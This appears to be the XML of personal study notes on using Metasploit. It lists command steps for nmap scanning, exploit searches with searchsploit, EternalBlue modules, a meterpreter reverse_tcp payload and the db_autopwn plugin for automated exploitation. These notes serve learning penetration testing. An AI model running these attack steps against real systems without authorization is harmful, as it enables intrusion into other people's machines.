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221E" w14:textId="3D7B15AC" w:rsidR="00853ABF" w:rsidRDefault="00C46337">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021175E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability scanning with MSF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D81DFF" w14:textId="24AC33FF" w:rsidR="00300C48" w:rsidRDefault="00300C48">
      <w:r>
        <w:t>The commands to do so:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753CBB5B" w14:textId="4DB24F1B" w:rsidR="00300C48" w:rsidRDefault="00C87608">
      <w:r>
        <w:t>Sudo nmap -sn ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A1FE5" w14:textId="0D3BC437" w:rsidR="00C87608" w:rsidRDefault="006B7271">
      <w:r>
        <w:t xml:space="preserve">Ip a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9C9120" w14:textId="7585BE55" w:rsidR="006B7271" w:rsidRDefault="006B7271">
      <w:r>
        <w:t>Service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082D8C12" w14:textId="5D36A8A2" w:rsidR="006B7271" w:rsidRDefault="006B7271">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF4245E" w14:textId="4E341E9F" w:rsidR="006B7271" w:rsidRDefault="006B7271">
      <w:r>
        <w:t>Db_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5EB651" w14:textId="452364B9" w:rsidR="006B7271" w:rsidRDefault="006B7271">
      <w:r>
        <w:t>Setg RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AB787B" w14:textId="4D5C253C" w:rsidR="006B7271" w:rsidRDefault="0014147F">
      <w:r>
        <w:t>Workspace -a ms3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFEA303" w14:textId="1119FDD6" w:rsidR="0014147F" w:rsidRDefault="003C06BE">
      <w:r>
        <w:t>Db_ nmap -sS -sV -O ip_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498FC017" w14:textId="77AD62C3" w:rsidR="003C06BE" w:rsidRDefault="00F17367">
      <w:r>
        <w:t>Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E369F7B" w14:textId="3923164A" w:rsidR="00F17367" w:rsidRDefault="00F17367">
      <w:r>
        <w:t>Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ADFE9A" w14:textId="13609610" w:rsidR="00F17367" w:rsidRDefault="00F17367">
      <w:r>
        <w:t>Search type:exploit name:Microsoft iis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78FC93" w14:textId="58B30B62" w:rsidR="00F17367" w:rsidRDefault="006B248B">
      <w:r>
        <w:t>Search type:exploit name:mysql 5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFADAAF" w14:textId="6D880177" w:rsidR="00486FFE" w:rsidRDefault="00486FFE">
      <w:r>
        <w:t>Search type:exploit name:</w:t>
      </w:r>
      <w:r>
        <w:t>glassfish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D09596" w14:textId="0E68A57B" w:rsidR="006B248B" w:rsidRDefault="00486FFE">
      <w:r>
        <w:t xml:space="preserve">Info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41186130" w14:textId="709A46DE" w:rsidR="00486FFE" w:rsidRPr="00486FFE" w:rsidRDefault="00486FFE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00486FFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609E55A1" w14:textId="36B5950F" w:rsidR="00486FFE" w:rsidRDefault="00486FFE">
      <w:r>
        <w:t>Info displays the information about the exploit that it will be applicable on which version of the software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E831D04" w14:textId="2333562B" w:rsidR="00FC59BD" w:rsidRDefault="00FC59BD">
      <w:r>
        <w:t xml:space="preserve">If our </w:t>
      </w:r>
      <w:r w:rsidR="00187A5A">
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> system is window then we have to use the payload of the window type and vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78354DDF" w14:textId="10F4544A" w:rsidR="00FC59BD" w:rsidRDefault="00187A5A">
      <w:r>
        <w:t>Set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6F103E" w14:textId="441D1B5E" w:rsidR="00187A5A" w:rsidRDefault="005F5681">
      <w:r>
        <w:t>Then set the options for module and payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC32725" w14:textId="77777777" w:rsidR="005F5681" w:rsidRDefault="005F5681"/>
    <w:p w14:paraId="28373F2F" w14:textId="77777777" w:rsidR="00582154" w:rsidRDefault="00582154"/>
    <w:p w14:paraId="3F4E19E9" w14:textId="397E07E7" w:rsidR="00582154" w:rsidRPr="00582154" w:rsidRDefault="00582154">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00582154">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Searchsploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA97F0" w14:textId="6C8B0875" w:rsidR="00582154" w:rsidRDefault="00582154">
      <w:r w:rsidRPr="00582154">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00582154">
        <w:t xml:space="preserve"> is a command-line tool that searches the </w:t>
      </w:r>
      <w:r w:rsidRPr="00582154">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00582154">
        <w:t xml:space="preserve"> (Exploit-DB) for known public exploits and vulnerability references — all offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA7606B" w14:textId="77777777" w:rsidR="00870DE3" w:rsidRDefault="00870DE3"/>
    <w:p w14:paraId="7A174846" w14:textId="3F86254F" w:rsidR="00870DE3" w:rsidRDefault="00C6546F">
      <w:r>
        <w:t xml:space="preserve">Searchsploit “Microsoft window </w:t>
      </w:r>
      <w:r w:rsidR="004D50D3">
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118613F" w14:textId="08ED3C05" w:rsidR="00C6546F" w:rsidRDefault="00C6546F">
      <w:r>
        <w:t>It show all the exploit available also the Metasploite exploit and others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57134F25" w14:textId="77777777" w:rsidR="00C6546F" w:rsidRDefault="00C6546F"/>
    <w:p w14:paraId="72C66376" w14:textId="6C813FA7" w:rsidR="004D50D3" w:rsidRDefault="004D50D3" w:rsidP="004D50D3">
      <w:r>
        <w:t xml:space="preserve">Searchsploit “Microsoft window </w:t>
      </w:r>
      <w:r>
        <w:t>SMB</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> | grep -e “metasploite”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57159A1E" w14:textId="29199F71" w:rsidR="004D50D3" w:rsidRDefault="004D50D3">
      <w:r>
        <w:t>It only show the Metasploit exploits now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D910546" w14:textId="77777777" w:rsidR="004D50D3" w:rsidRDefault="004D50D3"/>
    <w:p w14:paraId="180A5DD5" w14:textId="46CB1DE4" w:rsidR="003E02D8" w:rsidRDefault="003E02D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E02D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In msfconsole:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708DACED" w14:textId="5B4104C7" w:rsidR="003E02D8" w:rsidRPr="003E02D8" w:rsidRDefault="003E02D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Auxiliary(scan/detection):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C0D342" w14:textId="5364F463" w:rsidR="003E02D8" w:rsidRDefault="003E02D8">
      <w:r>
        <w:t>Search eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F98669" w14:textId="368FD6B3" w:rsidR="003E02D8" w:rsidRDefault="003E02D8">
      <w:r>
        <w:t>Use (num/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB591A" w14:textId="0EF3A633" w:rsidR="003E02D8" w:rsidRDefault="003E02D8">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C1A86" w14:textId="5EB38F8D" w:rsidR="003E02D8" w:rsidRDefault="003E02D8">
      <w:r>
        <w:t>Set values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2056F50B" w14:textId="0D400E2C" w:rsidR="003E02D8" w:rsidRDefault="003E02D8">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299F2514" w14:textId="77777777" w:rsidR="003E02D8" w:rsidRDefault="003E02D8"/>
    <w:p w14:paraId="08A65931" w14:textId="6D49129C" w:rsidR="003F009F" w:rsidRDefault="003F009F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F009F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A120FE" w14:textId="77777777" w:rsidR="003F009F" w:rsidRDefault="003F009F" w:rsidP="003F009F">
      <w:r>
        <w:t>Search eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B9832" w14:textId="77777777" w:rsidR="003F009F" w:rsidRDefault="003F009F" w:rsidP="003F009F">
      <w:r>
        <w:t>Use (num/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B938D9B" w14:textId="39825383" w:rsidR="003F009F" w:rsidRDefault="003F009F">
      <w:r w:rsidRPr="003F009F">
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A4112B" w14:textId="4009A4CF" w:rsidR="003F009F" w:rsidRDefault="003F009F">
      <w:r>
        <w:t>Set values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC6D42" w14:textId="68982277" w:rsidR="003F009F" w:rsidRDefault="003F009F">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CACB34" w14:textId="77777777" w:rsidR="003F009F" w:rsidRDefault="003F009F"/>
    <w:p w14:paraId="521AA4F1" w14:textId="13C43E1D" w:rsidR="003F009F" w:rsidRPr="003F009F" w:rsidRDefault="003F009F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F009F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F10A1" w14:textId="55F9250D" w:rsidR="003F009F" w:rsidRDefault="003F009F">
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D0B4A6" w14:textId="3CCD4C15" w:rsidR="003F009F" w:rsidRPr="00BE0D11" w:rsidRDefault="00BE0D11">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0D11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Metasploit_autopwn plugin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521ADC02" w14:textId="302F936A" w:rsidR="00BE0D11" w:rsidRDefault="00BE0D11">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="003928CC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://github.com/hahwul/metasploit-autopwn</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10F648A8" w14:textId="43285583" w:rsidR="00BE0D11" w:rsidRDefault="00BE0D11">
      <w:r>
        <w:t xml:space="preserve">place this in the section of the plugin of Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3397E525" w14:textId="0BBBB294" w:rsidR="00BE0D11" w:rsidRDefault="00BE0D11">
      <w:r>
        <w:t>then:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DADFBA4" w14:textId="4DC7CF5B" w:rsidR="00BE0D11" w:rsidRDefault="00BE0D11">
      <w:r>
        <w:t>load db_autopwn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1E42E0" w14:textId="5D6CAA23" w:rsidR="00BE0D11" w:rsidRDefault="00BE0D11">
      <w:r>
        <w:t>db_autopwn                         # to use it /it interact directly with Metasploit database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C76CFF9" w14:textId="0BE584EA" w:rsidR="00BE0D11" w:rsidRDefault="00583387">
      <w:r>
        <w:t>Db_autopwn -p -t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA83DC" w14:textId="358A1543" w:rsidR="004B229B" w:rsidRDefault="004B229B" w:rsidP="004B229B">
      <w:r>
        <w:t>Db_autopwn -p -t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -PI 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56197C88" w14:textId="77777777" w:rsidR="004B229B" w:rsidRDefault="004B229B" w:rsidP="004B229B"/>
    <w:p w14:paraId="37B6B769" w14:textId="77777777" w:rsidR="00E5307A" w:rsidRDefault="004B229B" w:rsidP="004B229B">
      <w:r>
        <w:t xml:space="preserve">Analyze </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774ED655" w14:textId="77777777" w:rsidR="00E5307A" w:rsidRPr="00E5307A" w:rsidRDefault="00E5307A" w:rsidP="004B229B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5307A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D772A" w14:textId="0586614F" w:rsidR="00E5307A" w:rsidRDefault="00E46DB3" w:rsidP="004B229B">
      <w:r w:rsidRPr="00E46DB3">
        <w:t xml:space="preserve">→ Metasploit checks your stored service list and gives you a list of </w:t>
      </w:r>
      <w:r w:rsidRPr="00E46DB3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>recommended auxiliary/exploit modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00E46DB3">
        <w:t xml:space="preserve"> to try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E08E2CB" w14:textId="5ED9769F" w:rsidR="00E5307A" w:rsidRDefault="00E46DB3" w:rsidP="004B229B">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00E5307A">
        <w:t>ulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA72417" w14:textId="3E8F23C3" w:rsidR="00E46DB3" w:rsidRDefault="00E46DB3" w:rsidP="004B229B">
      <w:r w:rsidRPr="00E46DB3">
        <w:t>→ the vulns command shows the vulnerabilities that have been discovered and stored in the database for your current workspace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDE7002" w14:textId="77777777" w:rsidR="00E5307A" w:rsidRDefault="00E5307A" w:rsidP="004B229B"/>
    <w:p w14:paraId="5392F7DC" w14:textId="747A8210" w:rsidR="004B229B" w:rsidRDefault="004B229B" w:rsidP="004B229B">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590095CB" w14:textId="77777777" w:rsidR="00583387" w:rsidRDefault="00583387"/>
    <w:p w14:paraId="293C6772" w14:textId="77777777" w:rsidR="00BE0D11" w:rsidRDefault="00BE0D11"/>
    <w:p w14:paraId="730049F7" w14:textId="77777777" w:rsidR="00BE0D11" w:rsidRPr="00BE0D11" w:rsidRDefault="00BE0D11"/>
    <w:p w14:paraId="313A9628" w14:textId="77777777" w:rsidR="00BE0D11" w:rsidRPr="003F009F" w:rsidRDefault="00BE0D11"/>
    <w:p w14:paraId="2A01907D" w14:textId="77777777" w:rsidR="004D50D3" w:rsidRDefault="004D50D3"/>
    <w:p w14:paraId="37A220A6" w14:textId="77777777" w:rsidR="004D50D3" w:rsidRPr="00300C48" w:rsidRDefault="004D50D3"/>
    <w:sectPr w:rsidR="004D50D3" w:rsidRPr="00300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C1"/>
    <w:rsid w:val="0014147F"/>
    <w:rsid w:val="00187A5A"/>
    <w:rsid w:val="0021175E"/>
    <w:rsid w:val="00300C48"/>
    <w:rsid w:val="003C06BE"/>
    <w:rsid w:val="003E02D8"/>
    <w:rsid w:val="003F009F"/>
    <w:rsid w:val="00486FFE"/>
    <w:rsid w:val="004B229B"/>
    <w:rsid w:val="004D50D3"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00582154"/>
    <w:rsid w:val="00583387"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005F5681"/>
    <w:rsid w:val="006B248B"/>
    <w:rsid w:val="006B7271"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00870DE3"/>
    <w:rsid w:val="00894E2B"/>
    <w:rsid w:val="009A0899"/>
    <w:rsid w:val="009E73A1"/>
    <w:rsid w:val="00A90FC1"/>
    <w:rsid w:val="00BE0D11"/>
    <w:rsid w:val="00C46337"/>
    <w:rsid w:val="00C6546F"/>
    <w:rsid w:val="00C87608"/>
    <w:rsid w:val="00E46DB3"/>
    <w:rsid w:val="00E5307A"/>
    <w:rsid w:val="00F17367"/>
    <w:rsid w:val="00F76BEA"/>
    <w:rsid w:val="00FC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F4CE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C30B6A07-97C4-49D2-830C-0F590F64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hwul/metasploit-autop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34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-12T08:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-12T09:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>